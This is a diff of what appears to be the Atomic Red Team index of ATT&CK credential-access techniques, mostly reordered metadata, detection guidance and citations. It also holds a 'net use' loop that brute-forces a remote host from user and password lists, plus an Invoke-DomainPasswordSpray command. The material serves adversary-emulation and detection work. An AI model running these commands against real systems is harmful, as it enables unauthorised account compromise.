x_mitre_data_sources:
- Network device logs
@@ -18594,17 +18892,17 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- modified: '2020-03-25T16:25:16.928Z'
+ modified: '2020-06-09T20:46:00.758Z'
created: '2017-05-31T21:30:19.735Z'
- x_mitre_version: '2.0'
- x_mitre_contributors:
- - Vincent Le Toux
- - Ed Williams, Trustwave, SpiderLabs
- x_mitre_data_sources:
- - API monitoring
- - Process monitoring
- - PowerShell logs
- - Process command-line parameters
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ - root
x_mitre_detection: "### Windows\nMonitor for unexpected processes interacting
with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from
Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002)
@@ -18644,15 +18942,15 @@ credential-access:
ships stock in many Linux distributions, can be used to watch for hostile
processes opening this file in the proc file system, alerting on the pid,
process name, and arguments of such programs."
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - API monitoring
+ - Process monitoring
+ - PowerShell logs
+ - Process command-line parameters
+ x_mitre_contributors:
+ - Vincent Le Toux
+ - Ed Williams, Trustwave, SpiderLabs
+ x_mitre_version: '2.0'
identifier: T1003
atomic_tests:
- name: Powershell Mimikatz
@@ -18784,27 +19082,26 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- modified: '2020-03-24T20:01:56.911Z'
+ modified: '2020-07-09T17:01:18.054Z'
created: '2020-02-11T18:38:56.197Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- - Azure
- - Office 365
- - Azure AD
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Authentication logs
+ - Office 365 account logs
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: It is difficult to detect when hashes are cracked, since
this is generally done outside the scope of the target network. Consider focusing
efforts on detecting other adversary behavior used to acquire credential materials,
such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003)
or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).
- x_mitre_permissions_required:
- - User
- x_mitre_data_sources:
- - Authentication logs
- - Office 365 account logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - Office 365
+ - Azure AD
atomic_tests: []
T1556.002:
technique:
@@ -18848,22 +19145,22 @@ credential-access:
phase_name: defense-evasion
modified: '2020-03-25T20:59:05.209Z'
created: '2020-02-11T19:05:45.829Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - File monitoring
+ - DLL monitoring
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- x_mitre_contributors:
- - Vincent Le Toux
- x_mitre_data_sources:
- - File monitoring
- - DLL monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
identifier: T1556.002
atomic_tests:
- name: Install and Register Password Filter DLL
@@ -18944,6 +19241,19 @@ credential-access:
phase_name: credential-access
modified: '2020-03-29T17:11:46.504Z'
created: '2020-02-11T18:38:22.617Z'
+ x_mitre_contributors:
+ - Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_data_sources:
+ - Authentication logs
+ - Office 365 account logs
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: Monitor authentication logs for system and application login
+ failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If
+ authentication failures are high, then there may be a brute force attempt
+ to gain access to a system using legitimate credentials.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- macOS
@@ -18954,19 +19264,6 @@ credential-access:
- AWS
- Azure
- SaaS
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_detection: Monitor authentication logs for system and application login
- failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If
- authentication failures are high, then there may be a brute force attempt
- to gain access to a system using legitimate credentials.
- x_mitre_permissions_required:
- - User
- x_mitre_data_sources:
- - Authentication logs
- - Office 365 account logs
- x_mitre_contributors:
- - Microsoft Threat Intelligence Center (MSTIC)
identifier: T1110.001
atomic_tests:
- name: Brute Force Credentials
@@ -19006,26 +19303,13 @@ credential-access:
@FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL
T1110.003:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1110.003
- url: https://attack.mitre.org/techniques/T1110/003
- - url: http://www.blackhillsinfosec.com/?p=4645
- description: Thyer, J. (2015, October 30). Password Spraying & Other Fun with
- RPCCLIENT. Retrieved April 25, 2017.
- source_name: BlackHillsInfosec Password Spraying
- - source_name: US-CERT TA18-068A 2018
- url: https://www.us-cert.gov/ncas/alerts/TA18-086A
- description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
- by Cyber Actors. Retrieved October 2, 2019.
- - source_name: Trimarc Detecting Password Spraying
- url: https://www.trimarcsecurity.com/single-post/2018/05/06/Trimarc-Research-Detecting-Password-Spraying-with-Security-Event-Auditing
- description: 'Metcalf, S. (2018, May 6). Trimarc Research: Detecting Password
- Spraying with Security Event Auditing. Retrieved January 16, 2019.'
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Password Spraying
+ created: '2020-02-11T18:39:25.122Z'
+ modified: '2020-03-29T17:13:57.172Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ type: attack-pattern
+ id: attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c
description: |-
Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
@@ -19047,13 +19331,26 @@ credential-access:
In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)
In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625.
- id: attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- modified: '2020-03-29T17:13:57.172Z'
- created: '2020-02-11T18:39:25.122Z'
+ name: Password Spraying
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1110.003
+ url: https://attack.mitre.org/techniques/T1110/003
+ - url: http://www.blackhillsinfosec.com/?p=4645
+ description: Thyer, J. (2015, October 30). Password Spraying & Other Fun with
+ RPCCLIENT. Retrieved April 25, 2017.
+ source_name: BlackHillsInfosec Password Spraying
+ - source_name: US-CERT TA18-068A 2018
+ url: https://www.us-cert.gov/ncas/alerts/TA18-086A
+ description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
+ by Cyber Actors. Retrieved October 2, 2019.
+ - source_name: Trimarc Detecting Password Spraying
+ url: https://www.trimarcsecurity.com/single-post/2018/05/06/Trimarc-Research-Detecting-Password-Spraying-with-Security-Event-Auditing
+ description: 'Metcalf, S. (2018, May 6). Trimarc Research: Detecting Password
+ Spraying with Security Event Auditing. Retrieved January 16, 2019.'
x_mitre_platforms:
- Linux
- macOS
@@ -19130,6 +19427,69 @@ credential-access:
Invoke-DomainPasswordSpray -Password Spring2017 -Domain #{domain} -Force
'
+ T1556.003:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1556.003
+ url: https://attack.mitre.org/techniques/T1556/003
+ - source_name: Apple PAM
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ - source_name: Man Pam_Unix
+ url: https://linux.die.net/man/8/pam_unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ - source_name: Red Hat PAM
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ - source_name: PAM Backdoor
+ url: https://github.com/zephrax/linux-pam-backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ - source_name: PAM Creds
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Pluggable Authentication Modules
+ description: |-
+ Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so, which retrieves, sets, and verifies account authentication information in /etc/passwd and /etc/shadow.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
+
+ Adversaries may modify components of the PAM system to create backdoors. PAM components, such as pam_unix.so, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor)
+
+ Malicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM)
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-07-13T21:23:01.370Z'
+ created: '2020-06-26T04:01:09.648Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - root
+ x_mitre_detection: |-
+ Monitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
+
+ Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_data_sources:
+ - Authentication logs
+ - File monitoring
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ atomic_tests: []
T1552.004:
technique:
id: attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf
@@ -19174,23 +19534,23 @@ credential-access:
phase_name: credential-access
modified: '2020-03-29T21:36:36.613Z'
created: '2020-02-04T13:06:49.258Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_contributors:
+ - Itzik Kotler, SafeBreach
+ x_mitre_data_sources:
+ - File monitoring
x_mitre_detection: Monitor access to files and directories related to cryptographic
keys and certificates as a means for potentially detecting access patterns
that may indicate collection and exfiltration activity. Collect authentication
logs and look for potentially abnormal activity that may indicate improper
use of keys or certificates for remote authentication.
- x_mitre_data_sources:
- - File monitoring
- x_mitre_contributors:
- - Itzik Kotler, SafeBreach
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_permissions_required:
+ - User
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1552.004
atomic_tests:
- name: Private Keys
@@ -19309,10 +19669,10 @@ credential-access:
phase_name: credential-access
modified: '2020-03-19T15:32:18.098Z'
created: '2020-02-11T18:46:24.434Z'
- x_mitre_platforms:
- - Linux
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process monitoring
+ x_mitre_permissions_required:
+ - root
x_mitre_detection: To obtain the passwords and hashes stored in memory, processes
must open a maps file in the /proc filesystem for the process being analyzed.
This file is stored under the path /proc/\*/maps, where the \*
@@ -19320,10 +19680,10 @@ credential-access:
data. The AuditD monitoring tool, which ships stock in many Linux distributions,
can be used to watch for hostile processes opening this file in the proc file
system, alerting on the pid, process name, and arguments of such programs.
- x_mitre_permissions_required:
- - root
- x_mitre_data_sources:
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
atomic_tests: []
T1003.002:
technique:
@@ -19359,10 +19719,14 @@ credential-access:
phase_name: credential-access
modified: '2020-03-25T15:17:30.640Z'
created: '2020-02-11T18:42:07.281Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Ed Williams, Trustwave, SpiderLabs
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - PowerShell logs
+ - Process monitoring
+ x_mitre_permissions_required:
+ - SYSTEM
x_mitre_detection: Hash dumpers open the Security Accounts Manager (SAM) on
the local file system (%SystemRoot%/system32/config/SAM) or create
a dump of the Registry SAM key to access stored account password hashes. Some
@@ -19370,14 +19734,10 @@ credential-access:
SAM table to avoid file access defenses. Others will make an in-memory copy
of the SAM table before reading hashes. Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078)
in-use by adversaries may help as well.
- x_mitre_permissions_required:
- - SYSTEM
- x_mitre_data_sources:
- - Process command-line parameters
- - PowerShell logs
- - Process monitoring
- x_mitre_contributors:
- - Ed Williams, Trustwave, SpiderLabs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
identifier: T1003.002
atomic_tests:
- name: Registry dump of SAM, creds, and secrets
@@ -19484,18 +19844,18 @@ credential-access:
phase_name: credential-access
modified: '2020-02-17T13:16:53.850Z'
created: '2020-02-12T18:56:31.051Z'
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process monitoring
+ x_mitre_permissions_required:
+ - root
x_mitre_detection: Monitor processes and command-line arguments for activity
surrounded users searching for credentials or using automated tools to scan
memory for passwords.
- x_mitre_permissions_required:
- - root
- x_mitre_data_sources:
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
atomic_tests: []
T1558.002:
technique:
@@ -19533,10 +19893,11 @@ credential-access:
phase_name: credential-access
modified: '2020-03-25T21:46:46.831Z'
created: '2020-02-11T19:14:48.309Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Authentication logs
+ - Windows event logs
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: "Monitor for anomalous Kerberos activity, such as malformed
or blank fields in Windows logon/logoff events (Event ID 4624, 4634, 4672).(Citation:
ADSecurity Detecting Forged Tickets) \n\nMonitor for unexpected processes
@@ -19545,11 +19906,10 @@ credential-access:
Service (LSASS) process by opening the process, locating the LSA secrets key,
and decrypting the sections in memory where credential details, including
Kerberos tickets, are stored."
- x_mitre_permissions_required:
- - User
- x_mitre_data_sources:
- - Authentication logs
- - Windows event logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1528:
technique:
@@ -19624,35 +19984,36 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- modified: '2020-03-23T15:59:40.522Z'
+ modified: '2020-07-14T19:16:30.906Z'
created: '2019-09-04T15:54:25.684Z'
- x_mitre_data_sources:
- - Azure activity logs
- - OAuth audit logs
- x_mitre_contributors:
- - Shailesh Tiwary (Indian Army)
- - Mark Wee
- - Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services)
- - Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)
- x_mitre_version: '1.0'
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - SaaS
- - Office 365
- - Azure AD
+ x_mitre_is_subtechnique: false
x_mitre_detection: |-
Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.
Security analysts can hunt for malicious apps using the tools available in their CASB, identity provider, or resource provider (depending on platform.) For example, they can filter for apps that are authorized by a small number of users, apps requesting high risk permissions, permissions incongruous with the app’s purpose, or apps with old “Last authorized” fields. A specific app can be investigated using an activity log displaying activities the app has performed, although some activities may be mis-logged as being performed by the user. App stores can be useful resources to further investigate suspicious apps.
Administrators can set up a variety of logs and leverage audit tools to monitor actions that can be conducted as a result of OAuth 2.0 access. For instance, audit reports enable admins to identify privilege escalation actions such as role creations or policy modifications, which could be actions performed after initial access.
+ x_mitre_platforms:
+ - SaaS
+ - Office 365
+ - Azure AD
+ x_mitre_permissions_required:
+ - User
+ x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Shailesh Tiwary (Indian Army)
+ - Mark Wee
+ - Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services)
+ - Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)
+ x_mitre_data_sources:
+ - Azure activity logs
+ - OAuth audit logs
atomic_tests: []
T1539:
technique:
external_references:
- - external_id: T1539
- source_name: mitre-attack
+ - source_name: mitre-attack
+ external_id: T1539
url: https://attack.mitre.org/techniques/T1539
- description: Rehberger, J. (2018, December). Pivot to the Cloud using Pass
the Cookie. Retrieved April 5, 2019.
@@ -19666,9 +20027,9 @@ credential-access:
url: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
description: Chen, Y., Hu, W., Xu, Z., et. al.. (2019, January 31). Mac Malware
Steals Cryptocurrency Exchanges’ Cookies. Retrieved October 14, 2019.
- - source_name: Github evilginx2
+ - description: Gretzky, Kuba. (2019, April 10). Retrieved October 8, 2019.
url: https://github.com/kgretzky/evilginx2
- description: Gretzky, Kuba. (2019, April 10). Retrieved October 8, 2019.
+ source_name: Github evilginx2
- source_name: GitHub Mauraena
url: https://github.com/muraenateam/muraena
description: Orrù, M., Trotta, G.. (2019, September 11). Muraena. Retrieved
@@ -19682,7 +20043,7 @@ credential-access:
Cookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie)
- There are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) There are also open source frameworks such as Evilginx 2 and Mauraena that can gather session cookies through a man-in-the-middle proxy that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena)
+ There are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) There are also open source frameworks such as Evilginx 2 and Muraena that can gather session cookies through a man-in-the-middle proxy that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena)
After an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1506) technique to login to the corresponding web application.
id: attack-pattern--10ffac09-e42d-4f56-ab20-db94c67d76ff
@@ -19690,26 +20051,27 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- modified: '2019-10-22T19:59:20.282Z'
+ modified: '2020-04-21T15:26:25.584Z'
created: '2019-10-08T20:04:35.508Z'
+ x_mitre_is_subtechnique: false
+ x_mitre_detection: Monitor for attempts to access files and repositories on
+ a local system that are used to store browser session cookies. Monitor for
+ attempts by programs to inject into or dump browser process memory.
+ x_mitre_data_sources:
+ - File monitoring
+ - API monitoring
+ x_mitre_version: '1.0'
+ x_mitre_permissions_required:
+ - User
+ x_mitre_contributors:
+ - Microsoft Threat Intelligence Center (MSTIC)
+ - Johann Rehberger
x_mitre_platforms:
- Linux
- macOS
- Windows
- Office 365
- SaaS
- x_mitre_contributors:
- - Microsoft Threat Intelligence Center (MSTIC)
- - Johann Rehberger
- x_mitre_permissions_required:
- - User
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - File monitoring
- - API monitoring
- x_mitre_detection: Monitor for attempts to access files and repositories on
- a local system that are used to store browser session cookies. Monitor for
- attempts by programs to inject into or dump browser process memory.
atomic_tests: []
T1558:
technique:
@@ -19772,10 +20134,11 @@ credential-access:
phase_name: credential-access
modified: '2020-03-31T12:59:11.121Z'
created: '2020-02-11T19:12:46.830Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
+ x_mitre_system_requirements:
+ - Kerberos authentication enabled
+ x_mitre_data_sources:
+ - Windows event logs
+ - Authentication logs
x_mitre_detection: "Monitor for anomalous Kerberos activity, such as malformed
or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634),
RC4 encryption within ticket granting tickets (TGTs), and ticket granting
@@ -19795,17 +20158,37 @@ credential-access:
access the LSA Subsystem Service (LSASS) process by opening the process, locating
the LSA secrets key, and decrypting the sections in memory where credential
details, including Kerberos tickets, are stored."
- x_mitre_data_sources:
- - Windows event logs
- - Authentication logs
- x_mitre_system_requirements:
- - Kerberos authentication enabled
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1111:
technique:
- id: attack-pattern--dd43c543-bb85-4a6f-aa6e-160d90d06a49
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Two-Factor Authentication Interception
+ created: '2017-05-31T21:31:23.195Z'
+ modified: '2020-03-25T20:35:21.672Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ type: attack-pattern
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1111
+ url: https://attack.mitre.org/techniques/T1111
+ - url: https://dl.mandiant.com/EE/assets/PDF_MTrends_2011.pdf
+ description: Mandiant. (2011, January 27). Mandiant M-Trends 2011. Retrieved
+ January 10, 2016.
+ source_name: Mandiant M Trends 2011
+ - url: https://gcn.com/articles/2011/06/07/rsa-confirms-tokens-used-to-hack-lockheed.aspx
+ description: Jackson, William. (2011, June 7). RSA confirms its tokens used
+ in Lockheed hack. Retrieved September 24, 2018.
+ source_name: GCN RSA June 2011
+ - url: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf
+ description: Sancho, D., Hacquebord, F., Link, R. (2014, July 22). Finding
+ Holes Operation Emmental. Retrieved February 9, 2016.
+ source_name: Operation Emmental
description: "Adversaries may target two-factor authentication mechanisms, such
as smart cards, to gain access to credentials that can be used to access systems,
services, and network resources. Use of two or multi-factor authentication
@@ -19829,30 +20212,9 @@ credential-access:
the device and/or service is not secured, then it may be vulnerable to interception.
Although primarily focused on by cyber criminals, these authentication mechanisms
have been targeted by advanced actors. (Citation: Operation Emmental)"
- external_references:
- - source_name: mitre-attack
- external_id: T1111
- url: https://attack.mitre.org/techniques/T1111
- - url: https://dl.mandiant.com/EE/assets/PDF_MTrends_2011.pdf
- description: Mandiant. (2011, January 27). Mandiant M-Trends 2011. Retrieved
- January 10, 2016.
- source_name: Mandiant M Trends 2011
- - url: https://gcn.com/articles/2011/06/07/rsa-confirms-tokens-used-to-hack-lockheed.aspx
- description: Jackson, William. (2011, June 7). RSA confirms its tokens used
- in Lockheed hack. Retrieved September 24, 2018.
- source_name: GCN RSA June 2011
- - url: http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf
- description: Sancho, D., Hacquebord, F., Link, R. (2014, July 22). Finding
- Holes Operation Emmental. Retrieved February 9, 2016.
- source_name: Operation Emmental
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- modified: '2020-03-25T20:35:21.672Z'
- created: '2017-05-31T21:31:23.195Z'
+ name: Two-Factor Authentication Interception
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--dd43c543-bb85-4a6f-aa6e-160d90d06a49
x_mitre_version: '1.1'
x_mitre_contributors:
- John Lambert, Microsoft Threat Intelligence Center
@@ -19882,26 +20244,26 @@ credential-access:
atomic_tests: []
T1552:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1552
- url: https://attack.mitre.org/techniques/T1552
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Unsecured Credentials
+ id: attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517
description: Adversaries may search compromised systems to find and obtain insecurely
stored credentials. These credentials can be stored and/or misplaced in many
locations on a system, including plaintext files (e.g. [Bash History](https://attack.mitre.org/techniques/T1552/003)),
operating system or application-specific repositories (e.g. [Credentials in
Registry](https://attack.mitre.org/techniques/T1552/002)), or other specialized
files/artifacts (e.g. [Private Keys](https://attack.mitre.org/techniques/T1552/004)).
- id: attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517
+ name: Unsecured Credentials
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1552
+ url: https://attack.mitre.org/techniques/T1552
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- modified: '2020-03-31T12:53:56.541Z'
+ modified: '2020-06-17T14:25:38.461Z'
created: '2020-02-04T12:47:23.631Z'
x_mitre_platforms:
- Linux
@@ -19935,6 +20297,14 @@ credential-access:
atomic_tests: []
T1056.003:
technique:
+ created: '2020-02-11T18:59:50.058Z'
+ modified: '2020-03-24T21:16:16.580Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ type: attack-pattern
id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
description: |-
Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -19955,27 +20325,19 @@ credential-access:
description: 'Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco
Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017.'
source_name: Volexity Virtual Private Keylogging
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- modified: '2020-03-24T21:16:16.580Z'
- created: '2020-02-11T18:59:50.058Z'
- x_mitre_system_requirements:
- - An externally facing login portal is configured.
- x_mitre_data_sources:
- - File monitoring
- x_mitre_detection: File monitoring may be used to detect changes to files in
- the Web directory for organization login pages that do not match with authorized
- updates to the Web server's content.
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- macOS
- Windows
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_detection: File monitoring may be used to detect changes to files in
+ the Web directory for organization login pages that do not match with authorized
+ updates to the Web server's content.
+ x_mitre_data_sources:
+ - File monitoring
+ x_mitre_system_requirements:
+ - An externally facing login portal is configured.
atomic_tests: []
defense-evasion:
T1548:
@@ -20002,14 +20364,17 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-27T12:18:44.286Z'
+ modified: '2020-06-25T19:57:54.923Z'
